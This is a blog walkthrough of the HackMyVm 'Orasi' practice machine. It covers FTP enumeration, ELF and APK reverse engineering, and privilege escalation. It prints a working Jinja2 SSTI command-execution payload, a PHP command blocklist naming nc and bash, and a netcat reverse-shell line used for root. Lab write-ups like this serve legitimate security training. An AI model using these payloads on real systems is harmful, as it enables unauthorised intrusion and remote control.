HackMyVm Orasi Walkthrough(SSTI, ELF analysis, APK analysis)

Machine can be download here.


Nmap scan ports, 4 ports open.

图片.png


Anonymous login ftp, get a file named "url".

图片.png


Download "url", check filetype, a ELF file.

图片.png


Use "strings" cmd to check useful strings, get nothing but a hint.

图片.png


Check the file in IDA, we noticed some chars, which can make a string "/sh4d0w$s".

图片.png

This string is a valid url at port 5000.

图片.png


The response is "No Input". Looks like we need to pass some data to it through some param. Next step is to find the param name.

Use some normal dictionary, we fail to fuzz the param name. Then we get back to port 80. There is only an index.html at port 80.

图片.png


Open index.html, we see some strange numbers and words.

图片.png

Under the hint of the author, this is "min_len max_len word_pattern" to generate a dic.

图片.png


Use the dic to fuzz the param name.

图片.png


Directly visit the url, it just echo back the string we input.

图片.png


In fact, it'a SSTI vulnerability.

图片.png


Because nmap has found port 5000 is "Werkzeug/1.0.1 Python/3.7.3",so we can google SSTI POC code for python server. For example, https://www.programmersought.com/article/91565232044/.

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}


Now we can run system command.

图片.png


Modify the code, and get reverse shell.

图片.png


In /home, we found two users, "irida" and "kori". In kori's home folder, there is a jail.php.

<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
if($var == null) die("Orasis Jail, argument missing\n");
function filter($var) {
        if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        $result = exec($var);
        echo "$result\n";
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>


Sudo -l for www-data.

图片.png


Although jail.php filter some keywords, we can still use "dash" to get a reverse shell and escalate to user kori.

图片.png


Sudo -l for kori, we get an apk file from user irida's home folder.

图片.png


Download irida.apk, unzip it, then use d2j-dex2jar to get "classes-dex2jar.jar".

图片.png


Use jd-gui to check to pseudo code. Search keyword "irida" (the username), we came to com.alienum.irida.data.

图片.png


Follow the order of the string builder, and read the hint of the author at HackMyVm-->Palique, we can get the password of user irida.

图片.png

Now we can ssh login as user irida.

图片.png


Sudo -l shows we can run a python file at /root folder.

图片.png


Run the file, input some string, we get error, and one line of the source code.

图片.png


Look like "name" var only accept hex format data.  We convert "/bin/bash" to hex format.

图片.png


Run oras.py again, then get error again. But this time get another line of source code, which is the key.

图片.png


The python file use "exec" to run python functions.  The reverse python code is following.

__import__( 'os' ).system('nc 192.168.56.150 1234 -e /bin/sh')

Convert it to hex format.

图片.png


At last, get reverse shell.

图片.png

  • 评论列表
  •  访客
     发布于 2021-03-13 01:14:20  回复该评论
  • 你好, 我想问下, 将irida.apk下载到本地是怎么下载的 我下载的时候提示没权限
    •  windy
       发布于 2021-03-13 17:52:05  回复该评论
    • 我个人喜欢在靶机用nc x.x.x.x xxxx irida.apk,然后在攻击机用nc -nlp xxxx ˃ irida.apk来接收。时间长了,有点记不住,你试试。
      •  访客
         发布于 2021-03-14 21:27:48  回复该评论
      • 提示权限不够 用python3 -m http.server,然后wget也是提示权限不够
        •  windy
           发布于 2021-03-15 18:03:54  回复该评论
        • 当前用户必须是kori,然后用sodu cp把apk文件从irida/里面复制出来,再下载。这个机器我已经删除了,所以很多细节想不起来。你可以在discord频道里问问其他人。

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.2